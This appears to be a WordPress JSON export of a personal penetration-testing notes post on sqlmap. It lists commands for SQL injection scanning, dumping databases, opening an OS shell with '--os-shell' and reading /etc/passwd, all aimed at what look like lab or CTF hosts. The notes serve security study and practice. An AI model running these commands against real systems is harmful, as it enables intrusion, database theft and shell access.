{"id":186,"date":"2019-08-12T20:21:27","date_gmt":"2019-08-12T18:21:27","guid":{"rendered":"https:\/\/privat.andreas-klingler.de\/itsec\/?p=186"},"modified":"2025-08-29T09:25:48","modified_gmt":"2025-08-29T07:25:48","slug":"sqlmap","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=186","title":{"rendered":"sqlmap"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Stan\u00addard&nbsp;case:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$ python sqlmap.py -u http:\/\/10.10.10.140\/index.php\/catalogsearch\/result\/?q=e<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">More aggre\u00adsive:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ python sqlmap.py -u http:\/\/10.10.10.140\/index.php\/catalogsearch\/result\/?q=e --level 5 --risk 3<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Dump <span class=\"caps\">DB<\/span>:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sqlmap -u http:\/\/target\/command.php?id=564 --dbms=mysql --dump --threads=5<\/pre>\n\n\n\n<pre id=\"block-c4523210-81b5-4872-b890-419ed5f8d19a\" class=\"wp-block-preformatted\">sqlmap -u http:\/\/target\/command.php?id=564 --dbms=mysql --tables<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Get shell:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sqlmap -u http:\/\/target\/command.php?id=564 --dbms=mysql --os-shell<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Use an exist\u00ading <span class=\"caps\">HTTP<\/span> request as tem\u00adplate. E.g. store a request in a text&nbsp;file:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">POST \/index.php HTT\/1.1<br>Header: value<br>...<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Then, use sqlmap with this file request.txt:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sqlmap -r r.txt -p $nameOfTheVulnerableField<br>sqlmap -r r.txt --dbms mysql --technique=U --dump<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Try to read a&nbsp;file:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sqlmap -u http:\/\/178.128.40.217:32711\/portfolio.php?id=1 --file-read=\/etc\/passwd<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><\/h2>\n","protected":false},"excerpt":{"rendered":"<p>Stan\u00addard&nbsp;case: $ python sqlmap.py \u2011u http:\/\/10.10.10.140\/index.php\/catalogsearch\/result\/?q=e More aggre\u00adsive: Dump <span class=\"caps\">DB<\/span>: sqlmap \u2011u http:\/\/target\/command.php?id=564 \u2013dbms=mysql \u2013dump \u2013threads=5 sqlmap \u2011u http:\/\/target\/command.php?id=564 \u2013dbms=mysql \u2013tables Get shell: sqlmap \u2011u http:\/\/target\/command.php?id=564 \u2013dbms=mysql \u2013os-shell Use an exist\u00ading <span class=\"caps\">HTTP<\/span> request as tem\u00adplate. E.g. store a request in a text&nbsp;file: <span class=\"caps\">POST<\/span> \/index.php <span class=\"caps\">HTT<\/span>\/1.1Header: val\u00adue\u2026 Then, use sqlmap with this file request.txt: sqlmap \u2011r [\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[470],"tags":[49,122],"class_list":["post-186","post","type-post","status-publish","format-standard","hentry","category-active-enum","tag-sql","tag-sqlmap"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/186","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=186"}],"version-history":[{"count":14,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/186\/revisions"}],"predecessor-version":[{"id":4877,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/186\/revisions\/4877"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=186"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=186"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=186"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}